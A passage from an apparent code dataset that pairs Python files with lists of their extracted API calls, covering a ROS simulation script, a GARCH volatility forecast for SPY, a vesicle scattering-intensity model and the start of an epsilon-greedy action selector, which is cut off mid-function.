(['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (3788, 3809), False, 'import time\n'), ((4642, 4676), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (4655, 4676), False, 'import time\n'), ((16324, 16358), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (16337, 16358), False, 'import time\n'), ((18472, 18506), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (18485, 18506), False, 'import time\n'), ((18741, 18800), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')"], {}), "('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')\n", (18752, 18800), False, 'import subprocess, shlex\n'), ((19238, 19251), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (19248, 19251), False, 'import time\n'), ((19274, 19320), 'os.path.isfile', 'os.path.isfile', (["(FLAGS.log_folder + '/nn_ready')"], {}), "(FLAGS.log_folder + '/nn_ready')\n", (19288, 19320), False, 'import sys, os, os.path\n'), ((19327, 19340), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (19337, 19340), False, 'import time\n'), ((24870, 24929), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')"], {}), "('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')\n", (24881, 24929), False, 'import subprocess, shlex\n'), ((25950, 25986), 'ast.literal_eval', 'ast.literal_eval', (['starting_positions'], {}), '(starting_positions)\n', (25966, 25986), False, 'import ast\n'), ((27557, 27571), 'std_srvs.srv.EmptyRequest', 'EmptyRequest', ([], {}), '()\n', (27569, 27571), False, 'from std_srvs.srv import EmptyRequest\n'), ((28088, 28116), 'os.path.isdir', 'os.path.isdir', (['data_location'], {}), '(data_location)\n', (28101, 28116), False, 'import sys, os, os.path\n'), ((28153, 28179), 'os.makedirs', 'os.makedirs', (['data_location'], {}), '(data_location)\n', (28164, 28179), False, 'import sys, os, os.path\n'), ((29378, 29412), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I-%M-%S"""'], {}), "('%Y-%m-%d_%I-%M-%S')\n", (29391, 29412), False, 'import time\n'), ((30082, 30116), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (30095, 30116), False, 'import time\n'), ((30631, 30668), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + fsm_file)"], {}), "('stat -c %Y ' + fsm_file)\n", (30642, 30668), False, 'import subprocess, shlex\n'), ((30936, 30950), 'time.sleep', 'time.sleep', (['(30)'], {}), '(30)\n', (30946, 30950), False, 'import time\n'), ((30997, 31008), 'time.time', 'time.time', ([], {}), '()\n', (31006, 31008), False, 'import time\n'), ((32709, 32720), 'time.time', 'time.time', ([], {}), '()\n', (32718, 32720), False, 'import time\n'), ((33474, 33485), 'sys.exit', 'sys.exit', (['(3)'], {}), '(3)\n', (33482, 33485), False, 'import sys, os, os.path\n'), ((4367, 4401), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (4380, 4401), False, 'import time\n'), ((14285, 14316), 'os.listdir', 'os.listdir', (['FLAGS.data_location'], {}), '(FLAGS.data_location)\n', (14295, 14316), False, 'import sys, os, os.path\n'), ((18854, 18913), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')"], {}), "('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')\n", (18865, 18913), False, 'import subprocess, shlex\n'), ((19220, 19231), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (19228, 19231), False, 'import sys, os, os.path\n'), ((19649, 
19660), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (19657, 19660), False, 'import sys, os, os.path\n'), ((24447, 24481), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I-%M-%S"""'], {}), "('%Y-%m-%d_%I-%M-%S')\n", (24460, 24481), False, 'import time\n'), ((25143, 25177), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (25156, 25177), False, 'import time\n'), ((28118, 28146), 'shutil.rmtree', 'shutil.rmtree', (['data_location'], {}), '(data_location)\n', (28131, 28146), False, 'import shutil\n'), ((31036, 31047), 'time.time', 'time.time', ([], {}), '()\n', (31045, 31047), False, 'import time\n'), ((32635, 32694), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')"], {}), "('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')\n", (32646, 32694), False, 'import subprocess, shlex\n'), ((32964, 32977), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (32974, 32977), False, 'import time\n'), ((33616, 33650), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (33629, 33650), False, 'import time\n'), ((18921, 18932), 'time.time', 'time.time', ([], {}), '()\n', (18930, 18932), False, 'import time\n'), ((19350, 19361), 'time.time', 'time.time', ([], {}), '()\n', (19359, 19361), False, 'import time\n'), ((20620, 20675), 'shlex.split', 'shlex.split', (['"""rospack find simulation_supervised_tools"""'], {}), "('rospack find simulation_supervised_tools')\n", (20631, 20675), False, 'import subprocess, shlex\n'), ((20715, 20779), 'shlex.split', 'shlex.split', (["('python ' + generator_file + ' ' + FLAGS.log_folder)"], {}), "('python ' + generator_file + ' ' + FLAGS.log_folder)\n", (20726, 20779), False, 'import subprocess, shlex\n'), ((22057, 22087), 'shlex.split', 'shlex.split', (['generator_command'], {}), '(generator_command)\n', (22068, 22087), False, 'import subprocess, shlex\n'), ((22230, 22241), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (22238, 22241), False, 'import sys, os, os.path\n'), ((30802, 30813), 'time.time', 'time.time', ([], {}), '()\n', (30811, 30813), False, 'import time\n'), ((30893, 30927), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (30906, 30927), False, 'import time\n'), ((31200, 31246), 'shlex.split', 'shlex.split', (['"""rostopic pub /go std_msgs/Empty"""'], {}), "('rostopic pub /go std_msgs/Empty')\n", (31211, 31246), False, 'import subprocess, shlex\n'), ((32771, 32805), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (32784, 32805), False, 'import time\n'), ((32899, 32958), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')"], {}), "('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')\n", (32910, 32958), False, 'import subprocess, shlex\n'), ((33241, 33252), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (33249, 33252), False, 'import sys, os, os.path\n'), ((33412, 33446), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (33425, 33446), False, 'import time\n'), ((19109, 19140), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M"""'], {}), "('%Y-%m-%d_%I:%M')\n", (19122, 19140), False, 'import time\n'), ((19538, 19569), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M"""'], {}), "('%Y-%m-%d_%I:%M')\n", (19551, 19569), False, 'import time\n'), ((28590, 28618), 'os.path.basename', 'os.path.basename', (['world_file'], {}), '(world_file)\n', (28606, 28618), False, 
'import sys, os, os.path\n'), ((32989, 33000), 'time.time', 'time.time', ([], {}), '()\n', (32998, 33000), False, 'import time\n'), ((14455, 14486), 'os.listdir', 'os.listdir', (['FLAGS.data_location'], {}), '(FLAGS.data_location)\n', (14465, 14486), False, 'import sys, os, os.path\n'), ((21682, 21737), 'shlex.split', 'shlex.split', (['"""rospack find simulation_supervised_tools"""'], {}), "('rospack find simulation_supervised_tools')\n", (21693, 21737), False, 'import subprocess, shlex\n'), ((32124, 32158), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (32137, 32158), False, 'import time\n'), ((33152, 33186), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (33165, 33186), False, 'import time\n'), ((31753, 31787), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (31766, 31787), False, 'import time\n'), ((31789, 31821), 'os.path.basename', 'os.path.basename', (['xterm_log_file'], {}), '(xterm_log_file)\n', (31805, 31821), False, 'import sys, os, os.path\n')]
|
import yfinance as yf
from datetime import datetime
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from arch import arch_model
from volatility.utils import get_percent_chg
start = datetime(2000, 1, 1)
end = datetime(2020, 9, 11)
symbol = 'SPY'
tickerData = yf.Ticker(symbol)
df = tickerData.history(period='1d', start=start, end=end)
get_percent_chg(df, 1)
get_percent_chg(df, 5)
get_percent_chg(df, 10)
get_percent_chg(df, 15)
get_percent_chg(df, 21)
returns = df.Close.pct_change().dropna()
df['ret_1a'] = returns
# test_size = 365*5
test_size = 365
keyList = ['ret_1', 'ret_5', 'ret_10', 'ret_15', 'ret_21']
fig, ax = plt.subplots(figsize=(10, 5), nrows=5, ncols=1)
k = 0
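# Rolling one-step-ahead volatility forecast: for each horizon key, refit a GARCH(2,2)
# model on an expanding window of past returns and record the predicted conditional
# volatility (square root of the forecast variance) for the next observation.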
for key in keyList:
returns = 100 * df[key].dropna()
predictions = []
print('key', key)
for i in range(test_size):
train = returns[:-(test_size-i)]
model = arch_model(train, p=2, q=2)
model_fit = model.fit(disp='off')
pred_val = model_fit.forecast(horizon=1)
predictions.append(np.sqrt(pred_val.variance.values[-1,:][0]))
predictions = pd.Series(predictions, index=returns.index[-test_size:])
ax[k].plot(returns[-test_size:], label=key, color='r')
ax[k].plot(predictions, label=key+' volpred', color='b')
ax[k].set_ylabel(key)
k += 1
ax[k-1].set_xlabel('Date')
plt.legend(['True Returns', 'Predicted Volatility'], loc=2, fontsize=8)
plt.show()
|
[
"datetime.datetime",
"pandas.Series",
"numpy.sqrt",
"arch.arch_model",
"volatility.utils.get_percent_chg",
"yfinance.Ticker",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] |
[((205, 225), 'datetime.datetime', 'datetime', (['(2000)', '(1)', '(1)'], {}), '(2000, 1, 1)\n', (213, 225), False, 'from datetime import datetime\n'), ((232, 253), 'datetime.datetime', 'datetime', (['(2020)', '(9)', '(11)'], {}), '(2020, 9, 11)\n', (240, 253), False, 'from datetime import datetime\n'), ((282, 299), 'yfinance.Ticker', 'yf.Ticker', (['symbol'], {}), '(symbol)\n', (291, 299), True, 'import yfinance as yf\n'), ((359, 381), 'volatility.utils.get_percent_chg', 'get_percent_chg', (['df', '(1)'], {}), '(df, 1)\n', (374, 381), False, 'from volatility.utils import get_percent_chg\n'), ((382, 404), 'volatility.utils.get_percent_chg', 'get_percent_chg', (['df', '(5)'], {}), '(df, 5)\n', (397, 404), False, 'from volatility.utils import get_percent_chg\n'), ((405, 428), 'volatility.utils.get_percent_chg', 'get_percent_chg', (['df', '(10)'], {}), '(df, 10)\n', (420, 428), False, 'from volatility.utils import get_percent_chg\n'), ((429, 452), 'volatility.utils.get_percent_chg', 'get_percent_chg', (['df', '(15)'], {}), '(df, 15)\n', (444, 452), False, 'from volatility.utils import get_percent_chg\n'), ((453, 476), 'volatility.utils.get_percent_chg', 'get_percent_chg', (['df', '(21)'], {}), '(df, 21)\n', (468, 476), False, 'from volatility.utils import get_percent_chg\n'), ((645, 692), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(10, 5)', 'nrows': '(5)', 'ncols': '(1)'}), '(figsize=(10, 5), nrows=5, ncols=1)\n', (657, 692), True, 'import matplotlib.pyplot as plt\n'), ((1336, 1407), 'matplotlib.pyplot.legend', 'plt.legend', (["['True Returns', 'Predicted Volatility']"], {'loc': '(2)', 'fontsize': '(8)'}), "(['True Returns', 'Predicted Volatility'], loc=2, fontsize=8)\n", (1346, 1407), True, 'import matplotlib.pyplot as plt\n'), ((1408, 1418), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1416, 1418), True, 'import matplotlib.pyplot as plt\n'), ((1095, 1151), 'pandas.Series', 'pd.Series', (['predictions'], {'index': 'returns.index[-test_size:]'}), '(predictions, index=returns.index[-test_size:])\n', (1104, 1151), True, 'import pandas as pd\n'), ((887, 914), 'arch.arch_model', 'arch_model', (['train'], {'p': '(2)', 'q': '(2)'}), '(train, p=2, q=2)\n', (897, 914), False, 'from arch import arch_model\n'), ((1033, 1076), 'numpy.sqrt', 'np.sqrt', (['pred_val.variance.values[-1, :][0]'], {}), '(pred_val.variance.values[-1, :][0])\n', (1040, 1076), True, 'import numpy as np\n')]
|
import numpy as np
import random
import numexpr as ne
def gen_layer(rin, rout, nsize):
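    # Place nsize points uniformly inside the spherical shell rin <= r <= rout:
    # r**3 is drawn uniformly (uniform density per unit volume) and the angles isotropically.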
R = 1.0
phi = np.random.uniform(0, 2*np.pi, size=(nsize))
costheta = np.random.uniform(-1, 1, size=(nsize))
u = np.random.uniform(rin**3, rout**3, size=(nsize))
theta = np.arccos( costheta )
r = R * np.cbrt( u )
x = r * np.sin( theta ) * np.cos( phi )
y = r * np.sin( theta ) * np.sin( phi )
z = r * np.cos( theta )
return( x, y, z )
def LPFbead(qrange, sigmabead):
'''
Compute the spherical form factor given a range of q values.
Parameters
----------
qrange: numpy.array
array of values in q-space to compute form factor for.
sigmabead: float
diameter of the sphere.
Return
-------
Fqb: numpy.array
array of values of the spherical form factors (F(q)) computed at q-points listed in qrange.
'''
R=np.true_divide(sigmabead,2)
QR=np.multiply(qrange,R)
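    # Form factor of a homogeneous sphere of radius R = sigmabead/2:
    # F(q) = 3 * [sin(qR) - qR*cos(qR)] / (qR)**3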
Fqb=np.multiply(np.true_divide(np.sin(QR)-np.multiply(QR,np.cos(QR)),np.power(QR,3)),3)
return Fqb
def LPOmega(qrange, nAin, nAout, nB, r): # q values, # of inner A, # of outer A, # of B scatterers, scatterer coordinates
Ntot=nAin+nB+nAout # Total number of scatterers to loop through
omegaarrt=np.zeros((1,len(qrange))) # initiating array
omegaarr=np.zeros((1,len(qrange))) # initiating array
    rur=r[0,:,:] # selects the coordinate block of the single stored replicate
rur=rur.transpose()
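    # Pairwise Debye sum: omega(q) = 1 + (2/Ntot) * sum_{i<j} sin(q*r_ij)/(q*r_ij),
    # accumulated below by looping over each scatterer i and all scatterers j > i.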
for i in range(Ntot-1): # loops through index and all further indexes to prevent double counting
all_disp = rur[i,:]-rur[(i+1):,:]
rij = np.sqrt(np.sum(np.square(all_disp),axis=1))
rij = rij.transpose()
rs = rij[:,np.newaxis] # reshapes array for consistency
Q = qrange[np.newaxis,:] # reshapes array for consistency
vals = ne.evaluate("sin(Q*rs)/(Q*rs)") # ne is efficient at calculations
inds=np.argwhere(np.isnan(vals)) # error catching in case there are NaN values
if len(inds)>0:
for val in inds:
vals[val[0],val[1]]=1
inds_double_check=np.argwhere(np.isnan(vals))
if len(inds_double_check)>0:
print('nan error!')
vals = ne.evaluate("sum((vals), axis=0)") # adds together scatterer contributions for each q value
omegaarr+=vals
    omegaarr=np.true_divide(2*omegaarr,Ntot)+1 # +1 accounts for the guaranteed overlap of a bead with itself; 2* restores the pairs skipped above to avoid double counting
omegaarrt+=omegaarr # stores values between loops
return omegaarrt
def visualize(r, Rcore, dR_Ain, dR_B, dR_Aout, sigmabead):
import py3Dmol
view = py3Dmol.view()
for ri in r[0,:,:].transpose():
if np.linalg.norm(ri) < Rcore+dR_Ain or np.linalg.norm(ri) > (Rcore+dR_Ain+dR_B):
col = 'blue'
else:
col = 'red'
view.addSphere(
{
'center': {'x': ri[0], 'y': ri[1], 'z': ri[2]},
'radius': sigmabead/2,
'color': col,
'alpha': 0.9,
}
)
#view.zoomTo()
view.show()
return view
def genLP(Rcore, dR_Ain, dR_B, dR_Aout, sigmabead, nAin, nAout, nB):
# core radius, inner A layer thickness, B layer thickness, outer A layer thickness,
# bead diameter, # of inner A beads, # of outer A beads, # of B beads
ntot = nAin+nB+nAout
power = 2
r = np.zeros((1, 3, ntot))
types = np.zeros((ntot))
### Create configuration for each replicate with dispersity ###
for step in range(0, 1):
### Populate A inner Layer ###
x, y, z = gen_layer(Rcore, Rcore+dR_Ain, nAin)
for i in range(nAin):
r[0,:,i] = [x[i], y[i], z[i]]
types[i] = 1
### Populate B middle Layer ###
x, y, z = gen_layer(Rcore+dR_Ain, Rcore+dR_Ain+dR_B, nB)
for i in range(nB):
r[0,:,i+nAin] = [x[i], y[i], z[i]]
types[i+nAin] = 2
### Populate A outer Layer ###
x, y, z = gen_layer(Rcore+dR_Ain+dR_B, Rcore+dR_Ain+dR_B+dR_Aout, nAout)
for i in range(nAout):
r[0,:,i+nAin+nB] = [x[i], y[i], z[i]]
types[i+nAin+nB] = 1
return r
class scatterer_generator:
'''
The wrapper class for vesicle shape. Default length unit: Angstrom.
Notes
-----
**The following 7 shape-specific descriptors are to be specified by user (see
*Attributes*) as
a list, in the precise order as listed, while calling `Model.load_shape`
to load this shape:**
num_scatterers:
Number of scatterers used to represent a chain. Default: 24
N:
Number of monomers in a chain. Default: 54
eta_B:
Packing fraction of scatterers in B layer. Default: 0.5
lmono_b:
Diameter of a monomer of chemistry B. Default: 50.4 A
lmono_a:
Diameter of a monomer of chemistry A. Default: 50.4 A
fb:
Fraction of monomers in chain that are of B type. fa = 1-fb. Default: 0.55
nLP:
Number of replicates for each individual. Default: 7
**The following 7 parameters are to be predicted, in the precise order
as listed, by GA:**
R_core:
Core radius. Default [min,max]: [50 A, 400 A]
t_Ain:
Thickness of inner A layer. Default [min,max]: [30 A, 200 A]
t_B:
Thickness of B layer. Default [min,max]: [30 A, 200 A]
t_Aout:
Thickness of outer A layer. Default [min,max]: [30 A, 200 A]
sigma_Ain:
Split of solvophilic scatterers between inner and outer layers.
Default [min,max]: [0.1, 0.45]
sigma_R:
Dispersity in vesicle size as implemented in the core radius.
Default [min,max]: [0.0, 0.45]
log10(bg):
Negative log10 of background intensity.
        E.g. a background intensity of 0.001 leads to this value being 3.
Default [min,max]: [0.1,4]
See also
--------
crease_ga.Model.load_shape
'''
def __init__(self,
shape_params = [24,54,0.5,50.4,50.4,0.55,7],
minvalu = (50, 30, 30, 30, 0.1, 0.0, 0.1),
maxvalu = (400, 200, 200, 200, 0.45, 0.45, 4)):
num_scatterers = shape_params[0]
N = shape_params[1]
rho_B = shape_params[2]
lmono_a = shape_params[3]
lmono_b= shape_params[4]
fb = shape_params[5]
nLP = shape_params[6]
self._numvars = 7
self.minvalu = minvalu
self.maxvalu = maxvalu
self.num_scatterers=num_scatterers ## number of scatterers per chain
self.N=N ## Number of beads on chain
self.rho_B=rho_B ## density/volume fraction of beads in B layer
self.lmono_a=lmono_a ## Angstrom 'monomer contour length'
self.lmono_b=lmono_b ## Angstrom 'monomer contour length'
self.MB=np.pi/6*(self.lmono_b)**3 ## volume of B monomer
self.sigmabead=np.true_divide(self.N*self.lmono_b,self.num_scatterers) ## scatterer bead diameter
self.fb=fb ## fraction of B type monomers in chain
self.nLP=nLP ## number of replicates
@property
def numvars(self):
return self._numvars
def converttoIQ(self, qrange, param):
'''
Calculate computed scattering intensity profile.
Parameters
----------
qrange: numpy.array
q values.
param: numpy.array
Decoded input parameters. See *Notes* section of the class
documentation.
Returns
-------
IQid: A numpy array holding I(q).
'''
# q values, decoded parameters,
# number of repeat units per chain, fraction of B beads per chain, core density,
# scatterer diameter, molar mass of B chemistry,
# length of A chemistry bond, length of B chemistry bond,
# number of scatterers per chain, # of replicates, stdev in Rcore size
sigmabead = self.sigmabead
N = self.N
fb = self.fb
rho_B = self.rho_B
MB = self.MB
lmono_a = self.lmono_a
lmono_b = self.lmono_b
num_scatterers = self.num_scatterers
nLP = self.nLP
IQid=np.zeros((len(qrange))) #initiates array for output IQ
### Parameters used to generate scatterer placements ###
Rcore=param[0]
dR_Ain=param[1]
dR_B=param[2]
dR_Aout=param[3]
sAin=param[4] # split of type A scatterer
sigmaR=param[5] # variation in Rcore, dispersity
#print(Rcore, dR_Ain, dR_B, dR_Aout, sAin)
Background=10**(-param[6])
varR = Rcore*sigmaR # variation in Rcore
disper = np.array([-2.0, -1.5, -1.0, -0.5, 0.0, 0.5, 1.0, 1.5, 2.0]) # fixed intervals of sigma
sum_omegaarr=np.zeros((1,len(qrange)))
for step in range(0, nLP):
Rcore = param[0] + varR*disper[step + int((9-nLP)/2.)] ## add displacement to Rcore
# print("disper = ", disper[step + int((9-nLP)/2.)])
# print("Rcore = ", Rcore)
vol_B = (4/3.0)*np.pi*(np.power(Rcore + dR_Ain + dR_B, 3)
- np.power(Rcore + dR_Ain, 3)) ## volume of solvophobic layer B
nagg = int(np.true_divide( rho_B*vol_B, N*fb*MB )) ## number of chains in vesicle
ntot = nagg*num_scatterers ## total number of scatterers
nB = int(ntot*fb) ## number of scatterers in B
nAin = int(ntot*(1-fb)*sAin) ## number of scatterers in A_in
nAout = int(ntot*(1-fb)*(1-sAin)) ## number of scatterers in A_out
for reps in range(0, 3):
### Generates scatterer positions in structure ###
r = genLP(Rcore, dR_Ain, dR_B, dR_Aout, sigmabead, nAin, nAout, nB)
### Calculates omega from scatterers in shape ###
sum_omegaarr += LPOmega(qrange, nAin, nAout, nB, r)
omegaarr=np.true_divide(sum_omegaarr,nLP*3) # average omega
omegaarr=omegaarr.reshape(len(qrange),)
        Fqb=LPFbead(qrange,sigmabead) # calculates the spherical form factor
F2qb=np.multiply(Fqb,Fqb) # Sphere shape factor square
        sqmm=np.ones(np.shape(Fqb)) # assuming a dilute mixture, the micelle-micelle structure factor = 1
F2qb_sqmm=np.multiply(F2qb,sqmm) # determines the micelle form factor
IQid=np.multiply(omegaarr,F2qb_sqmm) # calculates Icomp
maxIQ=np.max(IQid)
IQid=np.true_divide(IQid,maxIQ) # normalizes the I(q) to have its maximum = 1
IQid+=Background # add background
return IQid
|
[
"numpy.multiply",
"numpy.arccos",
"numexpr.evaluate",
"numpy.power",
"numpy.linalg.norm",
"numpy.max",
"numpy.square",
"numpy.array",
"numpy.zeros",
"numpy.isnan",
"numpy.true_divide",
"numpy.cos",
"numpy.random.uniform",
"numpy.sin",
"numpy.cbrt",
"numpy.shape",
"py3Dmol.view"
] |
[((119, 162), 'numpy.random.uniform', 'np.random.uniform', (['(0)', '(2 * np.pi)'], {'size': 'nsize'}), '(0, 2 * np.pi, size=nsize)\n', (136, 162), True, 'import numpy as np\n'), ((182, 218), 'numpy.random.uniform', 'np.random.uniform', (['(-1)', '(1)'], {'size': 'nsize'}), '(-1, 1, size=nsize)\n', (199, 218), True, 'import numpy as np\n'), ((233, 283), 'numpy.random.uniform', 'np.random.uniform', (['(rin ** 3)', '(rout ** 3)'], {'size': 'nsize'}), '(rin ** 3, rout ** 3, size=nsize)\n', (250, 283), True, 'import numpy as np\n'), ((299, 318), 'numpy.arccos', 'np.arccos', (['costheta'], {}), '(costheta)\n', (308, 318), True, 'import numpy as np\n'), ((959, 987), 'numpy.true_divide', 'np.true_divide', (['sigmabead', '(2)'], {}), '(sigmabead, 2)\n', (973, 987), True, 'import numpy as np\n'), ((994, 1016), 'numpy.multiply', 'np.multiply', (['qrange', 'R'], {}), '(qrange, R)\n', (1005, 1016), True, 'import numpy as np\n'), ((2902, 2916), 'py3Dmol.view', 'py3Dmol.view', ([], {}), '()\n', (2914, 2916), False, 'import py3Dmol\n'), ((3747, 3769), 'numpy.zeros', 'np.zeros', (['(1, 3, ntot)'], {}), '((1, 3, ntot))\n', (3755, 3769), True, 'import numpy as np\n'), ((3786, 3800), 'numpy.zeros', 'np.zeros', (['ntot'], {}), '(ntot)\n', (3794, 3800), True, 'import numpy as np\n'), ((337, 347), 'numpy.cbrt', 'np.cbrt', (['u'], {}), '(u)\n', (344, 347), True, 'import numpy as np\n'), ((385, 396), 'numpy.cos', 'np.cos', (['phi'], {}), '(phi)\n', (391, 396), True, 'import numpy as np\n'), ((433, 444), 'numpy.sin', 'np.sin', (['phi'], {}), '(phi)\n', (439, 444), True, 'import numpy as np\n'), ((463, 476), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (469, 476), True, 'import numpy as np\n'), ((1982, 2013), 'numexpr.evaluate', 'ne.evaluate', (['"""sin(Q*rs)/(Q*rs)"""'], {}), "('sin(Q*rs)/(Q*rs)')\n", (1993, 2013), True, 'import numexpr as ne\n'), ((2380, 2414), 'numexpr.evaluate', 'ne.evaluate', (['"""sum((vals), axis=0)"""'], {}), "('sum((vals), axis=0)')\n", (2391, 2414), True, 'import numexpr as ne\n'), ((2510, 2544), 'numpy.true_divide', 'np.true_divide', (['(2 * omegaarr)', 'Ntot'], {}), '(2 * omegaarr, Ntot)\n', (2524, 2544), True, 'import numpy as np\n'), ((7415, 7473), 'numpy.true_divide', 'np.true_divide', (['(self.N * self.lmono_b)', 'self.num_scatterers'], {}), '(self.N * self.lmono_b, self.num_scatterers)\n', (7429, 7473), True, 'import numpy as np\n'), ((9218, 9277), 'numpy.array', 'np.array', (['[-2.0, -1.5, -1.0, -0.5, 0.0, 0.5, 1.0, 1.5, 2.0]'], {}), '([-2.0, -1.5, -1.0, -0.5, 0.0, 0.5, 1.0, 1.5, 2.0])\n', (9226, 9277), True, 'import numpy as np\n'), ((10594, 10631), 'numpy.true_divide', 'np.true_divide', (['sum_omegaarr', '(nLP * 3)'], {}), '(sum_omegaarr, nLP * 3)\n', (10608, 10631), True, 'import numpy as np\n'), ((10805, 10826), 'numpy.multiply', 'np.multiply', (['Fqb', 'Fqb'], {}), '(Fqb, Fqb)\n', (10816, 10826), True, 'import numpy as np\n'), ((11024, 11047), 'numpy.multiply', 'np.multiply', (['F2qb', 'sqmm'], {}), '(F2qb, sqmm)\n', (11035, 11047), True, 'import numpy as np\n'), ((11115, 11147), 'numpy.multiply', 'np.multiply', (['omegaarr', 'F2qb_sqmm'], {}), '(omegaarr, F2qb_sqmm)\n', (11126, 11147), True, 'import numpy as np\n'), ((11194, 11206), 'numpy.max', 'np.max', (['IQid'], {}), '(IQid)\n', (11200, 11206), True, 'import numpy as np\n'), ((11254, 11281), 'numpy.true_divide', 'np.true_divide', (['IQid', 'maxIQ'], {}), '(IQid, maxIQ)\n', (11268, 11281), True, 'import numpy as np\n'), ((367, 380), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (373, 380), True, 'import 
numpy as np\n'), ((415, 428), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (421, 428), True, 'import numpy as np\n'), ((1089, 1104), 'numpy.power', 'np.power', (['QR', '(3)'], {}), '(QR, 3)\n', (1097, 1104), True, 'import numpy as np\n'), ((2078, 2092), 'numpy.isnan', 'np.isnan', (['vals'], {}), '(vals)\n', (2086, 2092), True, 'import numpy as np\n'), ((2280, 2294), 'numpy.isnan', 'np.isnan', (['vals'], {}), '(vals)\n', (2288, 2294), True, 'import numpy as np\n'), ((10902, 10915), 'numpy.shape', 'np.shape', (['Fqb'], {}), '(Fqb)\n', (10910, 10915), True, 'import numpy as np\n'), ((1051, 1061), 'numpy.sin', 'np.sin', (['QR'], {}), '(QR)\n', (1057, 1061), True, 'import numpy as np\n'), ((1738, 1757), 'numpy.square', 'np.square', (['all_disp'], {}), '(all_disp)\n', (1747, 1757), True, 'import numpy as np\n'), ((2969, 2987), 'numpy.linalg.norm', 'np.linalg.norm', (['ri'], {}), '(ri)\n', (2983, 2987), True, 'import numpy as np\n'), ((3006, 3024), 'numpy.linalg.norm', 'np.linalg.norm', (['ri'], {}), '(ri)\n', (3020, 3024), True, 'import numpy as np\n'), ((9790, 9832), 'numpy.true_divide', 'np.true_divide', (['(rho_B * vol_B)', '(N * fb * MB)'], {}), '(rho_B * vol_B, N * fb * MB)\n', (9804, 9832), True, 'import numpy as np\n'), ((1077, 1087), 'numpy.cos', 'np.cos', (['QR'], {}), '(QR)\n', (1083, 1087), True, 'import numpy as np\n'), ((9632, 9666), 'numpy.power', 'np.power', (['(Rcore + dR_Ain + dR_B)', '(3)'], {}), '(Rcore + dR_Ain + dR_B, 3)\n', (9640, 9666), True, 'import numpy as np\n'), ((9705, 9732), 'numpy.power', 'np.power', (['(Rcore + dR_Ain)', '(3)'], {}), '(Rcore + dR_Ain, 3)\n', (9713, 9732), True, 'import numpy as np\n')]
|
"""Strategies for selecting actions for value-based policies."""
from abc import ABC, abstractmethod
from typing import List, Optional
from numpy.typing import ArrayLike
import numpy as np
from rl.action_selectors import (
ActionSelector,
DeterministicActionSelector,
UniformDiscreteActionSelector,
NoisyActionSelector,
)
class ActionSelectionStrategy(ABC):
"""Base class for action selection strategies."""
@abstractmethod
def __call__(
self,
action_values: List[float],
action_counts: List[int],
) -> ActionSelector:
pass
class EpsilonGreedy(ActionSelectionStrategy):
"""Implementation of epsilon greedy action selection.
Args:
        epsilon: probability of taking an exploratory action rather than exploiting
random_state: `None`, `int`, or `np.random.Generator` to initialise
RNG
"""
def __init__(self, epsilon: float = 0.0, random_state=None):
self.epsilon = epsilon
self._rng = np.random.default_rng(random_state)
def __call__(
self,
